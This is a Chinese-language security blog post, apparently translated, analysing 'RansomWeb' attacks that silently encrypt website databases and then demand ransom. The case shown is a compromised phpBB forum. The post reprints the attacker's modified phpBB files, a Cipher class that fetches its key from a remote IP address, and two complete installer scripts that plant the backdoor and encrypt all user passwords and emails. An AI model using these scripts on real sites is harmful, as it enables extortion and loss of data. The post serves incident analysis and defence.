0x00 前言

---

目前越來越多的人稱為勒索軟體的受害者，惡意軟體會加密你的計算機直到你願意交保護費，最新的趨勢發現，網站已經成為犯罪分子的攻擊目標，犯罪軟體會加密你的資料庫直到你付錢。

source https://www.htbridge.com/blog/ransomweb_emerging_website_threat.html

0x01 守候

---

2014.12.** 我們的安全專家在一個理財網站上發現一個很有趣的案例:網站一直顯示無法連線資料庫，而網站管理員收到一封勒索郵件，“給錢，然後我們會給你資料庫解鎖”。

遇到這種型別攻擊的網站都是一些小型站點，但是公司的重點業務運營都是圍繞網站進行了，停了分分鐘幾萬，chinese一點地話來說，“網際網路公司”。

我們認真的進行了調查，發現一下幾點特點：

1 web應用程式在半年前被入侵，攻擊者修改了一些需要進行資料庫操作的指令碼，在插入資料時對資料進行加密，在查詢資料時對資料進行解密。整個過程 使用者沒有感到任何異樣。

2 只對關鍵的資料庫表被進行加密，將對網站效能的影響降到了最低，並且加密了之前被存入的資料庫記錄。

3 加密金鑰被儲存在遠端伺服器上，只能透過https訪問（一定可能性是為了防止被攔截）

4 在這6個月，駭客默默地守候著網站，當一些升級和運維行為時對伺服器進行備份。

5 在xxx天后，駭客關閉遠端伺服器，同時網站停止服務，and收到一封飽含著愛意的惡意郵件。

0x02 另一個案例

---

我們一開始相信這是一個針對部分公司進行的apt行為，屬於一個特殊的個別案例，不過後來發現我們錯了，上週我們又發現一個相似的例子，來自我們的另一個客戶。他收到了一個勒索郵件。。。在他的phpbb論壇失靈之後。對於客戶來說這個phpBB是一個非常重要的平臺，版本還是2014年11月25日釋出的phpBB 3.1.2 最新版。

最早問題來之於當時沒有一個使用者可以登入論壇，包括版主和管理員，使用者的認證功能已經失效，在我們的調查下發現，登入時需要的密碼和郵箱驗證在插入資料褲的時候經過了一次加密。

我們發現下列檔案遭到了修改。

1. factory.php

---

函式sql_fetchrow()遭到了修改，在進行sql查詢

#!php
$result = $this->get_driver()->sql_fetchrow($query_id);

password 和 email欄位會經過一次解密。

#!php
if(isset($result['user_password'])){ 
 $result['user_password'] = $cipher->decrypt($result['user_password']); 
} 
if(isset($result['user_email'])){ 
 $result['user_email'] = $cipher->decrypt($result['user_email']); 
}

2. functions_user.php

---

函式 user_add 經過修改之後 新增資料時會被加密

#!php
$sql_ary = array( 
 'username'=>$user_row['username'], 
 'username_clean' => $username_clean, 
 'user_password' => (isset($user_row['user_password']))? 
    $cipher->encrypt($user_row['user_password']):$cipher->encrypt(''), 
 'user_email'=> $cipher->encrypt(strtolower($user_row['user_email'])), 
 'user_email_hash'=> phpbb_email_hash($user_row['user_email']), 
 'group_id' => $user_row['group_id'], 
 'user_type' => $user_row['user_type'], 
);

3. cp_activate.php

---

main 函式遭到修改

#!php
$sql_ary = array( 
 'user_actkey' => '', 
 'user_password' => $cipher->encrypt($user_row['user_newpasswd']), 
 'user_newpasswd' => '', 
 'user_login_attempts' => 0, 
);

4. ucp_profile.php

---

main函式。。。

#!php
if (sizeof($sql_ary)) 
{ 
 $sql_ary['user_email'] = $cipher->encrypt($sql_ary['user_email']); 
 $sql_ary['user_password'] = $cipher->encrypt($sql_ary['user_password']);
 $sql = 'UPDATE ' . USERS_TABLE . ' 
  SET ' . $db->sql_build_array('UPDATE', $sql_ary) . ' 
  WHERE user_id = ' . $user->data['user_id']; 
 $db->sql_query($sql);

5. config.php

---

#!php
class Cipher { 
 private $securekey, $iv; 
 function __construct($textkey) { 
  $this->securekey = hash('sha256',$textkey,TRUE); 
  $this->iv = mcrypt_create_iv(32); 
 } 
 function encrypt($input) { 
  return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256, 
       $this->securekey, $input, MCRYPT_MODE_ECB, $this->iv)); 
 } 
 function decrypt($input) { 
  return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256, 
       $this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv)); 
 } 
} 
$key=file_get_contents('https://103.13.120.108/sfdoif89d7sf8d979dfgf/ 
sdfds90f8d9s0f8d0f89.txt'); 
$cipher=new Cipher($key);

一個值得注意的是，我們發現駭客留下的兩個可以自動化安裝後門的指令碼，可以對任意phpbb論壇植入後門程式，只需要幾下點選，第一個修改 “config.php” 新增 cipher類在指令碼中，其中可以看到 儲存在遠端伺服器上的 金鑰。

安裝檔案

#!php
<?php 
$file = '../config.php'; 
$txt = "\n".'class Cipher { 
 private $securekey, $iv; 
 function __construct($textkey) { 
  $this->securekey = hash(\'sha256\',$textkey,TRUE); 
  $this->iv = mcrypt_create_iv(32); 
 } 
 function encrypt($input) { 
  return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256, 
     $this->securekey, $input, MCRYPT_MODE_ECB, $this->iv)); 
  } 
 function decrypt($input) { 
  return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256, 
     $this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv)); 
 } 
} 
$key=file_get_contents(\'https://103.13.120.108/sfdoif89d7sf8d979dfgf/ 
sdfds90f8d9s0f8d0f89.txt\'); 
$cipher=new Cipher($key);'."\n"; 
if( FALSE !== file_put_contents($file, $txt, FILE_APPEND | LOCK_EX)){ 
 echo "DONE!"; 
};

第二個安裝檔案加密所有使用者的 email和password，並替換上述檔案。

#!php
<?php 
define('IN_PHPBB', true); 
$phpbb_root_path = (defined('PHPBB_ROOT_PATH')) ? PHPBB_ROOT_PATH : '../';
$phpEx = substr(strrchr(__FILE__, '.'), 1); 
include($phpbb_root_path . 'common.' . $phpEx); 
include($phpbb_root_path . 'includes/functions_display.' . $phpEx); 
$sql = 'SELECT user_id, user_password, user_email FROM ' . USERS_TABLE; 
$result = $db->sql_query($sql); 
while ($row = $db->sql_fetchrow($result)) 
{ 
 $sql2 = 'UPDATE ' . USERS_TABLE . ' 
  SET 
   user_password = "'.$cipher->encrypt($row['user_password']).'", 
   user_email = "'.$cipher->encrypt($row['user_email']).'" 
  WHERE user_id = '.$row['user_id']; 
 $result2 = $db->sql_query($sql2); 
} 
echo "SQL UPDATED!<br>"; 
copy('factory.php', '../phpbb/db/driver/factory.php'); 
copy('functions_user.php', '../includes/functions_user.php'); 
copy('ucp_activate.php', '../includes/ucp/ucp_activate.php'); 
copy('ucp_profile.php', '../includes/ucp/ucp_profile.php'); 
echo "FILES UPDATED!”;

接著攻擊者等待兩個月，就從遠端伺服器中取出金鑰。

0x03 結論

---

我們稱這種攻擊為 RansomWeb , 我們做了一個簡要的分析：

RansomWeb 的特點

1 與ddos不同，這種攻擊會對網站的可用性造成長時間的巨大影響。

2 不僅可以用於勒索，還可以用於其他很多用途。

3 不給錢想從攻擊中恢復很困難。

RansomWeb 的弱點

1 做下檔案監控就好了

2 在不對網站造成影響的情況下加密極其困難。

3 定期檢測更新